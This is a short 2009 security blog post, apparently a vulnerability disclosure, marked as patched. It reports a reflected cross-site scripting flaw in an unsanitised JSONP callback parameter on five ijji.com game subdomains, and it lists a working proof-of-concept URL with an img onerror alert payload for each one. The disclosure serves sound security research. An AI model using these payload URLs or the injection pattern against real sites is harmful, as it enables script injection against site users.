JSON Last Login Callback [BONUS]

29 July 2009

Type: Non-persistent
Criteria: None

This post will disclose 5 different subdomains which all use the lastlogin.nhn script to return the last login time for each game. All with the similar trend of the unsanitized callback variable, as seen in many other posts.

Gunz

http://gunz.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Soldier Front

http://sfront.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Lunia

http://lunia.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Drift City

http://drift.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

IJJI’s license for Gunbound expired on July 23rd 2009 (source), but that service was also vulnerable.

Gunbound

http://gunbound.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Like this:

Be the first to like this post.

This entry was posted on 29 July 2009 at 7:32 am and is filed under patched, x1nixmzeng.

IJJI XSS

Pages

Archives

Categories

Meta

JSON Last Login Callback [BONUS]

Like this:

Follow “IJJI XSS”